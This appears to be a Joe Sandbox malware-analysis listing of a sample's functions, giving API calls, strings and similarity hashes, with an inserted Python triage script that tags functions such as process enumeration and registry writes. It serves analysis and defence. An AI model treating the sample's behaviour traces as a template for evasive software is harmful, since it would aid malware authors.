                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                              • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                              • API String ID: 1916479912-1189179171
                                                                                              • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                              • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                              • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                              • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                              APIs
                                                                                              • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004241C1,762323A0,00000000), ref: 00406902
                                                                                              • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                              • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                              • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                              • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,004241C1,762323A0,00000000), ref: 00406A73
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                              • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                              • API String ID: 3581403547-1792361021
                                                                                              • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                              • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                              • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                              • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                              APIs
                                                                                              • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                              Strings
                                                                                              • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateInstance
                                                                                              • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                              • API String ID: 542301482-1377821865
                                                                                              • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                              • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                              • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                              • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                              • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                              • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                              • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                              • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                              • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                              • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                              APIs
                                                                                              • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                              • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                              • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                              • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                              • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                              • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                              • API String ID: 20674999-2124804629
                                                                                              • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                              • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                              • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                              • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
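The record above is the one worth a second look in this part of the listing: it loads PSAPI.DLL at run time, resolves EnumProcesses, EnumProcessModules and GetModuleBaseNameW through GetProcAddress, and carries the Toolhelp32 names (CreateToolhelp32Snapshot, Process32FirstW/NextW) in its String ID as the fallback path, so this function enumerates running processes. Most of the other records in this listing are installer-stub boilerplate (dialog painting, the "WriteReg:" and "RMDir:" log strings are the ones the NSIS stub emits). The script below is an added example, not part of the Joe Sandbox report or its tooling: it parses records in exactly this APIs / Strings / Similarity layout and tags each function with coarse behaviour categories so the boilerplate can be filtered out. The tag table is this example's own heuristic, and SAMPLE_REPORT is a constructed abridgement of the PSAPI-resolving record above and the WriteReg record further down.

```python
"""Added example (not Joe Sandbox tooling): parse 'Joe Sandbox IDA Plugin' function records and tag them."""
import re
from collections import namedtuple
from dataclasses import dataclass, field

# API line: optional subcall prefix, Name.MODULE, optional "(args)", then ", ref: ADDR"; the page's
# "wsprintfA.USER32 ref: ..." line has neither args nor the comma, hence the two "?" quantifiers.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
STRING_RE = re.compile(r"^•\s*(?P<text>.*), xrefs: (?P<ref>[0-9A-Fa-f]+)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
ApiCall = namedtuple("ApiCall", "name module args ref subcall_of")

# Heuristic tag table of this example, not a Joe Sandbox signature: a tag fires when the
# function imports, resolves via GetProcAddress, or carries as a string any listed name.
TAG_RULES = {
    "process_enumeration": {"EnumProcesses", "EnumProcessModules", "GetModuleBaseNameW",
                            "CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"},
    "registry_write": {"RegCreateKeyExW", "RegSetValueExW"},
    "shell_execute": {"ShellExecuteW"},
    "file_write": {"CreateFileW", "WriteFile"},
}

@dataclass
class FunctionRecord:
    api_calls: list = field(default_factory=list)   # ApiCall tuples, in listing order
    strings: list = field(default_factory=list)     # (text, xref) pairs
    similarity: dict = field(default_factory=dict)  # "API ID", "String ID", ...

    @property
    def resolved_names(self) -> set:
        # Export names handed to GetProcAddress, i.e. resolved only at run time.
        return {c.args[1] for c in self.api_calls if c.name == "GetProcAddress" and len(c.args) > 1}

    @property
    def referenced_strings(self) -> set:
        return {s for s in self.similarity.get("String ID", "").split("$") if s}

def parse_api_line(line: str):
    m = API_RE.match(line.strip())
    if not m:
        return None
    args = m["args"].split(",") if m["args"] is not None else []
    return ApiCall(m["name"], m["module"], args, m["ref"], m["sub"])

def parse_records(text: str) -> list:
    """One record per 'APIs' heading; the other headings only switch the section."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":
                current = FunctionRecord()
                records.append(current)
            section = line
        elif current is None or not line:
            continue
        elif section == "APIs" and (call := parse_api_line(line)):
            current.api_calls.append(call)
        elif section == "Strings" and (m := STRING_RE.match(line)):
            current.strings.append((m["text"], m["ref"]))
        elif section == "Similarity":
            key, _, value = line.lstrip("• ").partition(":")
            current.similarity[key.strip()] = value.strip()
    return records

def triage(rec: FunctionRecord) -> set:
    """Tags for one function; an empty set usually means installer-stub boilerplate."""
    names = {c.name for c in rec.api_calls} | rec.resolved_names | rec.referenced_strings
    tags = {tag for tag, apis in TAG_RULES.items() if names & apis}
    if rec.resolved_names:
        tags.add("dynamic_api_resolution")
    return tags

# Constructed abridgement of two records on this page (PSAPI resolver and WriteReg).
SAMPLE_REPORT = r"""APIs
• LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
  • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
• GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
• FreeLibrary.KERNEL32(00000000), ref: 00406500
Strings
Similarity
• String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
• API String ID: 20674999-2124804629
APIs
• RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
• RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
Strings
• WriteReg: error creating key "%s\%s", xrefs: 004029F5
Similarity
• API String ID: 1641139501-220328614
"""

if __name__ == "__main__":
    for rec in parse_records(SAMPLE_REPORT):
        print(rec.similarity.get("API String ID", "?"), sorted(triage(rec)))
```

Run against the full listing, the functions that come out with no tag are the paint handler and dialog code; the ones tagged process_enumeration, registry_write or file_write are where the sample's persistence and environment checks live, and the API String ID gives a stable key for matching the same function across other reports.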
                                                                                              APIs
                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                              • GetSysColor.USER32(?), ref: 004041DB
                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                              • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                              • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                              • SetCursor.USER32(00000000), ref: 004042FE
                                                                                              • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                              • SetCursor.USER32(00000000), ref: 00404322
                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                              • String ID: F$N$open
                                                                                              • API String ID: 3928313111-1104729357
                                                                                              • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                              • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                              • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                              • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                              APIs
                                                                                              • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                              • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                              • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                              • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                              • wsprintfA.USER32 ref: 00406B79
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                              • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                              • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                              • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                              • API String ID: 565278875-3368763019
                                                                                              • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                              • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                              • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                              • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                              APIs
                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                              • DeleteObject.GDI32(?), ref: 004010F6
                                                                                              • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                              • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                              • DeleteObject.GDI32(?), ref: 0040116E
                                                                                              • EndPaint.USER32(?,?), ref: 00401177
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                              • String ID: F
                                                                                              • API String ID: 941294808-1304234792
                                                                                              • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                              • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                              • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                              • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                              APIs
                                                                                              • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                              • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                              • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                              Strings
                                                                                              • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                              • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                              • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                              • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                              • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                              • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
